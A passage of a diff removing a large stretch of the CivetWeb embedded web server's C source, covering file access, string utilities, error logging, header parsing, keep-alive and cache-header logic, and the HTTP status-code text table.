-			case MG_FOPEN_MODE_WRITE:
-				filep->access.fp = _wfopen(wbuf, L"wb");
-				break;
-			case MG_FOPEN_MODE_APPEND:
-				filep->access.fp = _wfopen(wbuf, L"ab");
-				break;
-			}
-		}
-#else
-		/* Linux et al already use unicode. No need to convert. */
-		switch (mode) {
-		case MG_FOPEN_MODE_READ:
-			filep->access.fp = fopen(path, "r");
-			break;
-		case MG_FOPEN_MODE_WRITE:
-			filep->access.fp = fopen(path, "w");
-			break;
-		case MG_FOPEN_MODE_APPEND:
-			filep->access.fp = fopen(path, "a");
-			break;
-		}
-
-#endif
-		if (!found) {
-			/* File did not exist before fopen was called.
-			 * Maybe it has been created now. Get stat info
-			 * like creation time now. */
-			found = mg_stat(conn, path, &(filep->stat));
-			(void)found;
-		}
-
-		/* file is on disk */
-		return (filep->access.fp != NULL);
-
-	} else {
-		/* is_file_in_memory returned true */
-		if (open_file_in_memory(conn, path, filep, mode)) {
-			/* file is in memory */
-			return (filep->access.membuf != NULL);
-		}
-	}
-
-	/* Open failed */
-	return 0;
-}
-
-
-/* return 0 on success, just like fclose */
-static int
-mg_fclose(struct mg_file_access *fileacc)
-{
-	int ret = -1;
-	if (fileacc != NULL) {
-		if (fileacc->fp != NULL) {
-			ret = fclose(fileacc->fp);
-		} else if (fileacc->membuf != NULL) {
-			ret = 0;
-		}
-		/* reset all members of fileacc */
-		memset(fileacc, 0, sizeof(*fileacc));
-	}
-	return ret;
-}
-
-
-static void
-mg_strlcpy(register char *dst, register const char *src, size_t n)
-{
-	for (; *src != '\0' && n > 1; n--) {
-		*dst++ = *src++;
-	}
-	*dst = '\0';
-}
-
-
-static int
-lowercase(const char *s)
-{
-	return tolower(*(const unsigned char *)s);
-}
-
-
-int
-mg_strncasecmp(const char *s1, const char *s2, size_t len)
-{
-	int diff = 0;
-
-	if (len > 0) {
-		do {
-			diff = lowercase(s1++) - lowercase(s2++);
-		} while (diff == 0 && s1[-1] != '\0' && --len > 0);
-	}
-
-	return diff;
-}
-
-
-int
-mg_strcasecmp(const char *s1, const char *s2)
-{
-	int diff;
-
-	do {
-		diff = lowercase(s1++) - lowercase(s2++);
-	} while (diff == 0 && s1[-1] != '\0');
-
-	return diff;
-}
-
-
-static char *
-mg_strndup(const char *ptr, size_t len)
-{
-	char *p;
-
-	if ((p = (char *)mg_malloc(len + 1)) != NULL) {
-		mg_strlcpy(p, ptr, len + 1);
-	}
-
-	return p;
-}
-
-
-static char *
-mg_strdup(const char *str)
-{
-	return mg_strndup(str, strlen(str));
-}
-
-
-static const char *
-mg_strcasestr(const char *big_str, const char *small_str)
-{
-	size_t i, big_len = strlen(big_str), small_len = strlen(small_str);
-
-	if (big_len >= small_len) {
-		for (i = 0; i <= (big_len - small_len); i++) {
-			if (mg_strncasecmp(big_str + i, small_str, small_len) == 0) {
-				return big_str + i;
-			}
-		}
-	}
-
-	return NULL;
-}
-
-
-/* Return null terminated string of given maximum length.
- * Report errors if length is exceeded. */
-static void
-mg_vsnprintf(const struct mg_connection *conn,
-             int *truncated,
-             char *buf,
-             size_t buflen,
-             const char *fmt,
-             va_list ap)
-{
-	int n, ok;
-
-	if (buflen == 0) {
-		if (truncated) {
-			*truncated = 1;
-		}
-		return;
-	}
-
-#ifdef __clang__
-#pragma clang diagnostic push
-#pragma clang diagnostic ignored "-Wformat-nonliteral"
-/* Using fmt as a non-literal is intended here, since it is mostly called
- * indirectly by mg_snprintf */
-#endif
-
-	n = (int)vsnprintf_impl(buf, buflen, fmt, ap);
-	ok = (n >= 0) && ((size_t)n < buflen);
-
-#ifdef __clang__
-#pragma clang diagnostic pop
-#endif
-
-	if (ok) {
-		if (truncated) {
-			*truncated = 0;
-		}
-	} else {
-		if (truncated) {
-			*truncated = 1;
-		}
-		mg_cry(conn,
-		       "truncating vsnprintf buffer: [%.*s]",
-		       (int)((buflen > 200) ? 200 : (buflen - 1)),
-		       buf);
-		n = (int)buflen - 1;
-	}
-	buf[n] = '\0';
-}
-
-
-static void
-mg_snprintf(const struct mg_connection *conn,
-            int *truncated,
-            char *buf,
-            size_t buflen,
-            const char *fmt,
-            ...)
-{
-	va_list ap;
-
-	va_start(ap, fmt);
-	mg_vsnprintf(conn, truncated, buf, buflen, fmt, ap);
-	va_end(ap);
-}
-
-
-static int
-get_option_index(const char *name)
-{
-	int i;
-
-	for (i = 0; config_options[i].name != NULL; i++) {
-		if (strcmp(config_options[i].name, name) == 0) {
-			return i;
-		}
-	}
-	return -1;
-}
-
-
-const char *
-mg_get_option(const struct mg_context *ctx, const char *name)
-{
-	int i;
-	if ((i = get_option_index(name)) == -1) {
-		return NULL;
-	} else if (!ctx || ctx->config[i] == NULL) {
-		return "";
-	} else {
-		return ctx->config[i];
-	}
-}
-
-
-struct mg_context *
-mg_get_context(const struct mg_connection *conn)
-{
-	return (conn == NULL) ? (struct mg_context *)NULL : (conn->ctx);
-}
-
-
-void *
-mg_get_user_data(const struct mg_context *ctx)
-{
-	return (ctx == NULL) ? NULL : ctx->user_data;
-}
-
-
-void
-mg_set_user_connection_data(struct mg_connection *conn, void *data)
-{
-	if (conn != NULL) {
-		conn->request_info.conn_data = data;
-	}
-}
-
-
-void *
-mg_get_user_connection_data(const struct mg_connection *conn)
-{
-	if (conn != NULL) {
-		return conn->request_info.conn_data;
-	}
-	return NULL;
-}
-
-
-#if defined(MG_LEGACY_INTERFACE)
-/* Deprecated: Use mg_get_server_ports instead. */
-size_t
-mg_get_ports(const struct mg_context *ctx, size_t size, int *ports, int *ssl)
-{
-	size_t i;
-	if (!ctx) {
-		return 0;
-	}
-	for (i = 0; i < size && i < ctx->num_listening_sockets; i++) {
-		ssl[i] = ctx->listening_sockets[i].is_ssl;
-		ports[i] =
-#if defined(USE_IPV6)
-		    (ctx->listening_sockets[i].lsa.sa.sa_family == AF_INET6)
-		        ? ntohs(ctx->listening_sockets[i].lsa.sin6.sin6_port)
-		        :
-#endif
-		        ntohs(ctx->listening_sockets[i].lsa.sin.sin_port);
-	}
-	return i;
-}
-#endif
-
-
-int
-mg_get_server_ports(const struct mg_context *ctx,
-                    int size,
-                    struct mg_server_ports *ports)
-{
-	int i, cnt = 0;
-
-	if (size <= 0) {
-		return -1;
-	}
-	memset(ports, 0, sizeof(*ports) * (size_t)size);
-	if (!ctx) {
-		return -1;
-	}
-	if (!ctx->listening_sockets) {
-		return -1;
-	}
-
-	for (i = 0; (i < size) && (i < (int)ctx->num_listening_sockets); i++) {
-
-		ports[cnt].port =
-#if defined(USE_IPV6)
-		    (ctx->listening_sockets[i].lsa.sa.sa_family == AF_INET6)
-		        ? ntohs(ctx->listening_sockets[i].lsa.sin6.sin6_port)
-		        :
-#endif
-		        ntohs(ctx->listening_sockets[i].lsa.sin.sin_port);
-		ports[cnt].is_ssl = ctx->listening_sockets[i].is_ssl;
-		ports[cnt].is_redirect = ctx->listening_sockets[i].ssl_redir;
-
-		if (ctx->listening_sockets[i].lsa.sa.sa_family == AF_INET) {
-			/* IPv4 */
-			ports[cnt].protocol = 1;
-			cnt++;
-		} else if (ctx->listening_sockets[i].lsa.sa.sa_family == AF_INET6) {
-			/* IPv6 */
-			ports[cnt].protocol = 3;
-			cnt++;
-		}
-	}
-
-	return cnt;
-}
-
-
-static void
-sockaddr_to_string(char *buf, size_t len, const union usa *usa)
-{
-	buf[0] = '\0';
-
-	if (!usa) {
-		return;
-	}
-
-	if (usa->sa.sa_family == AF_INET) {
-		getnameinfo(&usa->sa,
-		            sizeof(usa->sin),
-		            buf,
-		            (unsigned)len,
-		            NULL,
-		            0,
-		            NI_NUMERICHOST);
-	}
-#if defined(USE_IPV6)
-	else if (usa->sa.sa_family == AF_INET6) {
-		getnameinfo(&usa->sa,
-		            sizeof(usa->sin6),
-		            buf,
-		            (unsigned)len,
-		            NULL,
-		            0,
-		            NI_NUMERICHOST);
-	}
-#endif
-}
-
-
-/* Convert time_t to a string. According to RFC2616, Sec 14.18, this must be
- * included in all responses other than 100, 101, 5xx. */
-static void
-gmt_time_string(char *buf, size_t buf_len, time_t *t)
-{
-	struct tm *tm;
-
-	tm = ((t != NULL) ? gmtime(t) : NULL);
-	if (tm != NULL) {
-		strftime(buf, buf_len, "%a, %d %b %Y %H:%M:%S GMT", tm);
-	} else {
-		mg_strlcpy(buf, "Thu, 01 Jan 1970 00:00:00 GMT", buf_len);
-		buf[buf_len - 1] = '\0';
-	}
-}
-
-
-/* difftime for struct timespec. Return value is in seconds. */
-static double
-mg_difftimespec(const struct timespec *ts_now, const struct timespec *ts_before)
-{
-	return (double)(ts_now->tv_nsec - ts_before->tv_nsec) * 1.0E-9
-	       + (double)(ts_now->tv_sec - ts_before->tv_sec);
-}
-
-
-/* Print error message to the opened error log stream. */
-void
-mg_cry(const struct mg_connection *conn, const char *fmt, ...)
-{
-	char buf[MG_BUF_LEN], src_addr[IP_ADDR_STR_LEN];
-	va_list ap;
-	struct mg_file fi;
-	time_t timestamp;
-
-	va_start(ap, fmt);
-	IGNORE_UNUSED_RESULT(vsnprintf_impl(buf, sizeof(buf), fmt, ap));
-	va_end(ap);
-	buf[sizeof(buf) - 1] = 0;
-
-	DEBUG_TRACE("mg_cry: %s", buf);
-
-	if (!conn) {
-		puts(buf);
-		return;
-	}
-
-	/* Do not lock when getting the callback value, here and below.
-	 * I suppose this is fine, since function cannot disappear in the
-	 * same way string option can. */
-	if ((conn->ctx->callbacks.log_message == NULL)
-	    || (conn->ctx->callbacks.log_message(conn, buf) == 0)) {
-
-		if (conn->ctx->config[ERROR_LOG_FILE] != NULL) {
-			if (mg_fopen(conn,
-			             conn->ctx->config[ERROR_LOG_FILE],
-			             MG_FOPEN_MODE_APPEND,
-			             &fi) == 0) {
-				fi.access.fp = NULL;
-			}
-		} else {
-			fi.access.fp = NULL;
-		}
-
-		if (fi.access.fp != NULL) {
-			flockfile(fi.access.fp);
-			timestamp = time(NULL);
-
-			sockaddr_to_string(src_addr, sizeof(src_addr), &conn->client.rsa);
-			fprintf(fi.access.fp,
-			        "[%010lu] [error] [client %s] ",
-			        (unsigned long)timestamp,
-			        src_addr);
-
-			if (conn->request_info.request_method != NULL) {
-				fprintf(fi.access.fp,
-				        "%s %s: ",
-				        conn->request_info.request_method,
-				        conn->request_info.request_uri
-				            ? conn->request_info.request_uri
-				            : "");
-			}
-
-			fprintf(fi.access.fp, "%s", buf);
-			fputc('\n', fi.access.fp);
-			fflush(fi.access.fp);
-			funlockfile(fi.access.fp);
-			(void)mg_fclose(&fi.access); /* Ignore errors. We can't call
-			                              * mg_cry here anyway ;-) */
-		}
-	}
-}
-
-
-/* Return fake connection structure. Used for logging, if connection
- * is not applicable at the moment of logging. */
-static struct mg_connection *
-fc(struct mg_context *ctx)
-{
-	static struct mg_connection fake_connection;
-	fake_connection.ctx = ctx;
-	return &fake_connection;
-}
-
-
-const char *
-mg_version(void)
-{
-	return CIVETWEB_VERSION;
-}
-
-
-const struct mg_request_info *
-mg_get_request_info(const struct mg_connection *conn)
-{
-	if (!conn) {
-		return NULL;
-	}
-#if 1 /* TODO: deal with legacy */
-	if (conn->connection_type == CONNECTION_TYPE_RESPONSE) {
-		static char txt[16];
-		sprintf(txt, "%03i", conn->response_info.status_code);
-
-		((struct mg_connection *)conn)->request_info.local_uri =
-		    ((struct mg_connection *)conn)->request_info.request_uri =
-		        txt; /* TODO: not thread safe */
-
-		((struct mg_connection *)conn)->request_info.num_headers =
-		    conn->response_info.num_headers;
-		memcpy(((struct mg_connection *)conn)->request_info.http_headers,
-		       conn->response_info.http_headers,
-		       sizeof(conn->response_info.http_headers));
-	} else
-#endif
-	    if (conn->connection_type != CONNECTION_TYPE_REQUEST) {
-		return NULL;
-	}
-	return &conn->request_info;
-}
-
-
-const struct mg_response_info *
-mg_get_response_info(const struct mg_connection *conn)
-{
-	if (!conn) {
-		return NULL;
-	}
-	if (conn->connection_type != CONNECTION_TYPE_RESPONSE) {
-		return NULL;
-	}
-	return &conn->response_info;
-}
-
-
-static const char *
-get_proto_name(const struct mg_connection *conn)
-{
-#ifdef __clang__
-#pragma clang diagnostic push
-#pragma clang diagnostic ignored "-Wunreachable-code"
-/* Depending on USE_WEBSOCKET and NO_SSL, some oft the protocols might be
- * not supported. Clang raises an "unreachable code" warning for parts of ?:
- * unreachable, but splitting into four different #ifdef clauses here is more
- * complicated.
- */
-#endif
-
-	const struct mg_request_info *ri = &conn->request_info;
-
-	const char *proto =
-	    (is_websocket_protocol(conn) ? (ri->is_ssl ? "wss" : "ws")
-	                                 : (ri->is_ssl ? "https" : "http"));
-
-	return proto;
-
-#ifdef __clang__
-#pragma clang diagnostic pop
-#endif
-}
-
-
-int
-mg_get_request_link(const struct mg_connection *conn, char *buf, size_t buflen)
-{
-	if ((buflen < 1) || (buf == 0) || (conn == 0)) {
-		return -1;
-	} else {
-
-		int truncated = 0;
-		const struct mg_request_info *ri = &conn->request_info;
-
-		const char *proto = get_proto_name(conn);
-
-		if (ri->local_uri == NULL) {
-			return -1;
-		}
-
-		if ((ri->request_uri != NULL)
-		    && strcmp(ri->local_uri, ri->request_uri)) {
-			mg_snprintf(conn,
-			            &truncated,
-			            buf,
-			            buflen,
-			            "%s://%s",
-			            proto,
-			            ri->request_uri);
-			if (truncated) {
-				return -1;
-			}
-			return 0;
-		} else {
-
-#if defined(USE_IPV6)
-			int is_ipv6 = (conn->client.lsa.sa.sa_family == AF_INET6);
-			int port = is_ipv6 ? htons(conn->client.lsa.sin6.sin6_port)
-			                   : htons(conn->client.lsa.sin.sin_port);
-#else
-			int port = htons(conn->client.lsa.sin.sin_port);
-#endif
-			int def_port = ri->is_ssl ? 443 : 80;
-			int auth_domain_check_enabled =
-			    conn->ctx->config[ENABLE_AUTH_DOMAIN_CHECK]
-			    && (!mg_strcasecmp(conn->ctx->config[ENABLE_AUTH_DOMAIN_CHECK],
-			                       "yes"));
-			const char *server_domain =
-			    conn->ctx->config[AUTHENTICATION_DOMAIN];
-
-			char portstr[16];
-			char server_ip[48];
-
-			if (port != def_port) {
-				sprintf(portstr, ":%u", (unsigned)port);
-			} else {
-				portstr[0] = 0;
-			}
-
-			if (!auth_domain_check_enabled || !server_domain) {
-
-				sockaddr_to_string(server_ip,
-				                   sizeof(server_ip),
-				                   &conn->client.lsa);
-
-				server_domain = server_ip;
-			}
-
-			mg_snprintf(conn,
-			            &truncated,
-			            buf,
-			            buflen,
-			            "%s://%s%s%s",
-			            proto,
-			            server_domain,
-			            portstr,
-			            ri->local_uri);
-			if (truncated) {
-				return -1;
-			}
-			return 0;
-		}
-	}
-}
-
-/* Skip the characters until one of the delimiters characters found.
- * 0-terminate resulting word. Skip the delimiter and following whitespaces.
- * Advance pointer to buffer to the next word. Return found 0-terminated
- * word.
- * Delimiters can be quoted with quotechar. */
-static char *
-skip_quoted(char **buf,
-            const char *delimiters,
-            const char *whitespace,
-            char quotechar)
-{
-	char *p, *begin_word, *end_word, *end_whitespace;
-
-	begin_word = *buf;
-	end_word = begin_word + strcspn(begin_word, delimiters);
-
-	/* Check for quotechar */
-	if (end_word > begin_word) {
-		p = end_word - 1;
-		while (*p == quotechar) {
-			/* While the delimiter is quoted, look for the next delimiter.
-			 */
-			/* This happens, e.g., in calls from parse_auth_header,
-			 * if the user name contains a " character. */
-
-			/* If there is anything beyond end_word, copy it. */
-			if (*end_word != '\0') {
-				size_t end_off = strcspn(end_word + 1, delimiters);
-				memmove(p, end_word, end_off + 1);
-				p += end_off; /* p must correspond to end_word - 1 */
-				end_word += end_off + 1;
-			} else {
-				*p = '\0';
-				break;
-			}
-		}
-		for (p++; p < end_word; p++) {
-			*p = '\0';
-		}
-	}
-
-	if (*end_word == '\0') {
-		*buf = end_word;
-	} else {
-
-#if defined(__GNUC__) || defined(__MINGW32__)
-/* Disable spurious conversion warning for GCC */
-#if GCC_VERSION >= 40500
-#pragma GCC diagnostic push
-#pragma GCC diagnostic ignored "-Wsign-conversion"
-#endif /* GCC_VERSION >= 40500 */
-#endif /* defined(__GNUC__) || defined(__MINGW32__) */
-
-		end_whitespace = end_word + strspn(&end_word[1], whitespace) + 1;
-
-#if defined(__GNUC__) || defined(__MINGW32__)
-#if GCC_VERSION >= 40500
-#pragma GCC diagnostic pop
-#endif /* GCC_VERSION >= 40500 */
-#endif /* defined(__GNUC__) || defined(__MINGW32__) */
-
-		for (p = end_word; p < end_whitespace; p++) {
-			*p = '\0';
-		}
-
-		*buf = end_whitespace;
-	}
-
-	return begin_word;
-}
-
-
-/* Return HTTP header value, or NULL if not found. */
-static const char *
-get_header(const struct mg_header *hdr, int num_hdr, const char *name)
-{
-	int i;
-	for (i = 0; i < num_hdr; i++) {
-		if (!mg_strcasecmp(name, hdr[i].name)) {
-			return hdr[i].value;
-		}
-	}
-
-	return NULL;
-}
-
-
-#if defined(USE_WEBSOCKET)
-/* Retrieve requested HTTP header multiple values, and return the number of
- * found occurences */
-static int
-get_req_headers(const struct mg_request_info *ri,
-                const char *name,
-                const char **output,
-                int output_max_size)
-{
-	int i;
-	int cnt = 0;
-	if (ri) {
-		for (i = 0; i < ri->num_headers && cnt < output_max_size; i++) {
-			if (!mg_strcasecmp(name, ri->http_headers[i].name)) {
-				output[cnt++] = ri->http_headers[i].value;
-			}
-		}
-	}
-	return cnt;
-}
-#endif
-
-
-const char *
-mg_get_header(const struct mg_connection *conn, const char *name)
-{
-	if (!conn) {
-		return NULL;
-	}
-
-	if (conn->connection_type == CONNECTION_TYPE_REQUEST) {
-		return get_header(conn->request_info.http_headers,
-		                  conn->request_info.num_headers,
-		                  name);
-	}
-	if (conn->connection_type == CONNECTION_TYPE_RESPONSE) {
-		return get_header(conn->response_info.http_headers,
-		                  conn->request_info.num_headers,
-		                  name);
-	}
-	return NULL;
-}
-
-
-static const char *
-get_http_version(const struct mg_connection *conn)
-{
-	if (!conn) {
-		return NULL;
-	}
-
-	if (conn->connection_type == CONNECTION_TYPE_REQUEST) {
-		return conn->request_info.http_version;
-	}
-	if (conn->connection_type == CONNECTION_TYPE_RESPONSE) {
-		return conn->response_info.http_version;
-	}
-	return NULL;
-}
-
-
-/* A helper function for traversing a comma separated list of values.
- * It returns a list pointer shifted to the next value, or NULL if the end
- * of the list found.
- * Value is stored in val vector. If value has form "x=y", then eq_val
- * vector is initialized to point to the "y" part, and val vector length
- * is adjusted to point only to "x". */
-static const char *
-next_option(const char *list, struct vec *val, struct vec *eq_val)
-{
-	int end;
-
-reparse:
-	if (val == NULL || list == NULL || *list == '\0') {
-		/* End of the list */
-		return NULL;
-	}
-
-	/* Skip over leading LWS */
-	while (*list == ' ' || *list == '\t')
-		list++;
-
-	val->ptr = list;
-	if ((list = strchr(val->ptr, ',')) != NULL) {
-		/* Comma found. Store length and shift the list ptr */
-		val->len = ((size_t)(list - val->ptr));
-		list++;
-	} else {
-		/* This value is the last one */
-		list = val->ptr + strlen(val->ptr);
-		val->len = ((size_t)(list - val->ptr));
-	}
-
-	/* Adjust length for trailing LWS */
-	end = (int)val->len - 1;
-	while (end >= 0 && ((val->ptr[end] == ' ') || (val->ptr[end] == '\t')))
-		end--;
-	val->len = (size_t)(end + 1);
-
-	if (val->len == 0) {
-		/* Ignore any empty entries. */
-		goto reparse;
-	}
-
-	if (eq_val != NULL) {
-		/* Value has form "x=y", adjust pointers and lengths
-		 * so that val points to "x", and eq_val points to "y". */
-		eq_val->len = 0;
-		eq_val->ptr = (const char *)memchr(val->ptr, '=', val->len);
-		if (eq_val->ptr != NULL) {
-			eq_val->ptr++; /* Skip over '=' character */
-			eq_val->len = ((size_t)(val->ptr - eq_val->ptr)) + val->len;
-			val->len = ((size_t)(eq_val->ptr - val->ptr)) - 1;
-		}
-	}
-
-	return list;
-}
-
-
-/* A helper function for checking if a comma separated list of values
- * contains
- * the given option (case insensitvely).
- * 'header' can be NULL, in which case false is returned. */
-static int
-header_has_option(const char *header, const char *option)
-{
-	struct vec opt_vec;
-	struct vec eq_vec;
-
-	/*
-	assert(option != NULL);
-	assert(option[0] != '\0');
-	*/
-
-	while ((header = next_option(header, &opt_vec, &eq_vec)) != NULL) {
-		if (mg_strncasecmp(option, opt_vec.ptr, opt_vec.len) == 0)
-			return 1;
-	}
-
-	return 0;
-}
-
-
-/* Perform case-insensitive match of string against pattern */
-static int
-match_prefix(const char *pattern, size_t pattern_len, const char *str)
-{
-	const char *or_str;
-	size_t i;
-	int j, len, res;
-
-	if ((or_str = (const char *)memchr(pattern, '|', pattern_len)) != NULL) {
-		res = match_prefix(pattern, (size_t)(or_str - pattern), str);
-		return (res > 0) ? res : match_prefix(or_str + 1,
-		                                      (size_t)((pattern + pattern_len)
-		                                               - (or_str + 1)),
-		                                      str);
-	}
-
-	for (i = 0, j = 0; (i < pattern_len); i++, j++) {
-		if ((pattern[i] == '?') && (str[j] != '\0')) {
-			continue;
-		} else if (pattern[i] == '$') {
-			return (str[j] == '\0') ? j : -1;
-		} else if (pattern[i] == '*') {
-			i++;
-			if (pattern[i] == '*') {
-				i++;
-				len = (int)strlen(str + j);
-			} else {
-				len = (int)strcspn(str + j, "/");
-			}
-			if (i == pattern_len) {
-				return j + len;
-			}
-			do {
-				res = match_prefix(pattern + i, pattern_len - i, str + j + len);
-			} while (res == -1 && len-- > 0);
-			return (res == -1) ? -1 : j + res + len;
-		} else if (lowercase(&pattern[i]) != lowercase(&str[j])) {
-			return -1;
-		}
-	}
-	return j;
-}
-
-
-/* HTTP 1.1 assumes keep alive if "Connection:" header is not set
- * This function must tolerate situations when connection info is not
- * set up, for example if request parsing failed. */
-static int
-should_keep_alive(const struct mg_connection *conn)
-{
-	const char *http_version;
-	const char *header;
-
-	/* First satisfy needs of the server */
-	if ((conn == NULL) || conn->must_close) {
-		/* Close, if civetweb framework needs to close */
-		return 0;
-	}
-
-	if (mg_strcasecmp(conn->ctx->config[ENABLE_KEEP_ALIVE], "yes") != 0) {
-		/* Close, if keep alive is not enabled */
-		return 0;
-	}
-
-	/* Check explicit wish of the client */
-	header = mg_get_header(conn, "Connection");
-	if (header) {
-		/* If there is a connection header from the client, obey */
-		if (header_has_option(header, "keep-alive")) {
-			return 1;
-		}
-		return 0;
-	}
-
-	/* Use default of the standard */
-	http_version = get_http_version(conn);
-	if (http_version && (0 == strcmp(http_version, "1.1"))) {
-		/* HTTP 1.1 default is keep alive */
-		return 1;
-	}
-
-	/* HTTP 1.0 (and earlier) default is to close the connection */
-	return 0;
-}
-
-
-static int
-should_decode_url(const struct mg_connection *conn)
-{
-	if (!conn || !conn->ctx) {
-		return 0;
-	}
-
-	return (mg_strcasecmp(conn->ctx->config[DECODE_URL], "yes") == 0);
-}
-
-
-static const char *
-suggest_connection_header(const struct mg_connection *conn)
-{
-	return should_keep_alive(conn) ? "keep-alive" : "close";
-}
-
-
-static int
-send_no_cache_header(struct mg_connection *conn)
-{
-	/* Send all current and obsolete cache opt-out directives. */
-	return mg_printf(conn,
-	                 "Cache-Control: no-cache, no-store, "
-	                 "must-revalidate, private, max-age=0\r\n"
-	                 "Pragma: no-cache\r\n"
-	                 "Expires: 0\r\n");
-}
-
-
-static int
-send_static_cache_header(struct mg_connection *conn)
-{
-#if !defined(NO_CACHING)
-	/* Read the server config to check how long a file may be cached.
-	 * The configuration is in seconds. */
-	int max_age = atoi(conn->ctx->config[STATIC_FILE_MAX_AGE]);
-	if (max_age <= 0) {
-		/* 0 means "do not cache". All values <0 are reserved
-		 * and may be used differently in the future. */
-		/* If a file should not be cached, do not only send
-		 * max-age=0, but also pragmas and Expires headers. */
-		return send_no_cache_header(conn);
-	}
-
-	/* Use "Cache-Control: max-age" instead of "Expires" header.
-	 * Reason: see https://www.mnot.net/blog/2007/05/15/expires_max-age */
-	/* See also https://www.mnot.net/cache_docs/ */
-	/* According to RFC 2616, Section 14.21, caching times should not exceed
-	 * one year. A year with 365 days corresponds to 31536000 seconds, a
-	 * leap
-	 * year to 31622400 seconds. For the moment, we just send whatever has
-	 * been configured, still the behavior for >1 year should be considered
-	 * as undefined. */
-	return mg_printf(conn, "Cache-Control: max-age=%u\r\n", (unsigned)max_age);
-#else  /* NO_CACHING */
-	return send_no_cache_header(conn);
-#endif /* !NO_CACHING */
-}
-
-
-static int
-send_additional_header(struct mg_connection *conn)
-{
-	int i = 0;
-	const char *header = conn->ctx->config[ADDITIONAL_HEADER];
-
-#if !defined(NO_SSL)
-	if (conn->ctx->config[STRICT_HTTPS_MAX_AGE]) {
-		int max_age = atoi(conn->ctx->config[STRICT_HTTPS_MAX_AGE]);
-		if (max_age >= 0) {
-			i += mg_printf(conn,
-			               "Strict-Transport-Security: max-age=%u\r\n",
-			               (unsigned)max_age);
-		}
-	}
-#endif
-
-	if (header && header[0]) {
-		i += mg_printf(conn, "%s\r\n", header);
-	}
-
-	return i;
-}
-
-
-static void handle_file_based_request(struct mg_connection *conn,
-                                      const char *path,
-                                      struct mg_file *filep);
-
-
-const char *
-mg_get_response_code_text(const struct mg_connection *conn, int response_code)
-{
-	/* See IANA HTTP status code assignment:
-	 * http://www.iana.org/assignments/http-status-codes/http-status-codes.xhtml
-	 */
-
-	switch (response_code) {
-	/* RFC2616 Section 10.1 - Informational 1xx */
-	case 100:
-		return "Continue"; /* RFC2616 Section 10.1.1 */
-	case 101:
-		return "Switching Protocols"; /* RFC2616 Section 10.1.2 */
-	case 102:
-		return "Processing"; /* RFC2518 Section 10.1 */
-
-	/* RFC2616 Section 10.2 - Successful 2xx */
-	case 200:
-		return "OK"; /* RFC2616 Section 10.2.1 */
-	case 201:
-		return "Created"; /* RFC2616 Section 10.2.2 */
-	case 202:
-		return "Accepted"; /* RFC2616 Section 10.2.3 */
-	case 203:
-		return "Non-Authoritative Information"; /* RFC2616 Section 10.2.4 */
-	case 204:
-		return "No Content"; /* RFC2616 Section 10.2.5 */
-	case 205:
-		return "Reset Content"; /* RFC2616 Section 10.2.6 */
-	case 206:
-		return "Partial Content"; /* RFC2616 Section 10.2.7 */
-	case 207:
-		return "Multi-Status"; /* RFC2518 Section 10.2, RFC4918 Section 11.1
-		                          */
-	case 208:
-		return "Already Reported"; /* RFC5842 Section 7.1 */
-
-	case 226:
-		return "IM used"; /* RFC3229 Section 10.4.1 */
-
-	/* RFC2616 Section 10.3 - Redirection 3xx */
-	case 300:
-		return "Multiple Choices"; /* RFC2616 Section 10.3.1 */
-	case 301:
-		return "Moved Permanently"; /* RFC2616 Section 10.3.2 */
-	case 302:
-		return "Found"; /* RFC2616 Section 10.3.3 */
-	case 303:
-		return "See Other"; /* RFC2616 Section 10.3.4 */
-	case 304:
-		return "Not Modified"; /* RFC2616 Section 10.3.5 */
-	case 305:
-		return "Use Proxy"; /* RFC2616 Section 10.3.6 */
-	case 307:
-		return "Temporary Redirect"; /* RFC2616 Section 10.3.8 */
-	case 308:
-		return "Permanent Redirect"; /* RFC7238 Section 3 */
-
-	/* RFC2616 Section 10.4 - Client Error 4xx */
-	case 400:
-		return "Bad Request"; /* RFC2616 Section 10.4.1 */
-	case 401:
-		return "Unauthorized"; /* RFC2616 Section 10.4.2 */
-	case 402:
-		return "Payment Required"; /* RFC2616 Section 10.4.3 */
-	case 403:
-		return "Forbidden"; /* RFC2616 Section 10.4.4 */
-	case 404:
-		return "Not Found"; /* RFC2616 Section 10.4.5 */
-	case 405:
-		return "Method Not Allowed"; /* RFC2616 Section 10.4.6 */
-	case 406:
-		return "Not Acceptable"; /* RFC2616 Section 10.4.7 */
-	case 407:
-		return "Proxy Authentication Required"; /* RFC2616 Section 10.4.8 */
-	case 408:
-		return "Request Time-out"; /* RFC2616 Section 10.4.9 */
-	case 409:
-		return "Conflict"; /* RFC2616 Section 10.4.10 */
-	case 410:
-		return "Gone"; /* RFC2616 Section 10.4.11 */
-	case 411:
-		return "Length Required"; /* RFC2616 Section 10.4.12 */
-	case 412:
-		return "Precondition Failed"; /* RFC2616 Section 10.4.13 */
-	case 413:
-		return "Request Entity Too Large"; /* RFC2616 Section 10.4.14 */
-	case 414:
-		return "Request-URI Too Large"; /* RFC2616 Section 10.4.15 */
-	case 415:
-		return "Unsupported Media Type"; /* RFC2616 Section 10.4.16 */
-	case 416:
-		return "Requested range not satisfiable"; /* RFC2616 Section 10.4.17
-		                                             */
-	case 417:
-		return "Expectation Failed"; /* RFC2616 Section 10.4.18 */
-
-	case 421:
-		return "Misdirected Request"; /* RFC7540 Section 9.1.2 */
-	case 422:
-		return "Unproccessable entity"; /* RFC2518 Section 10.3, RFC4918
-		                                 * Section 11.2 */
-	case 423:
-		return "Locked"; /* RFC2518 Section 10.4, RFC4918 Section 11.3 */
-	case 424:
-		return "Failed Dependency"; /* RFC2518 Section 10.5, RFC4918
-		                             * Section 11.4 */
-
-	case 426:
-		return "Upgrade Required"; /* RFC 2817 Section 4 */
-
-	case 428:
-		return "Precondition Required"; /* RFC 6585, Section 3 */
-	case 429:
-		return "Too Many Requests"; /* RFC 6585, Section 4 */
-
-	case 431:
-		return "Request Header Fields Too Large"; /* RFC 6585, Section 5 */
-
-	case 451:
-		return "Unavailable For Legal Reasons"; /* draft-tbray-http-legally-restricted-status-05,
-		                                         * Section 3 */
-
-	/* RFC2616 Section 10.5 - Server Error 5xx */
-	case 500:
-		return "Internal Server Error"; /* RFC2616 Section 10.5.1 */
-	case 501:
-		return "Not Implemented"; /* RFC2616 Section 10.5.2 */
-	case 502:
-		return "Bad Gateway"; /* RFC2616 Section 10.5.3 */
-	case 503:
-		return "Service Unavailable"; /* RFC2616 Section 10.5.4 */
-	case 504:
-		return "Gateway Time-out"; /* RFC2616 Section 10.5.5 */
-	case 505:
-		return "HTTP Version not supported"; /* RFC2616 Section 10.5.6 */
-	case 506:
-		return "Variant Also Negotiates"; /* RFC 2295, Section 8.1 */
-	case 507:
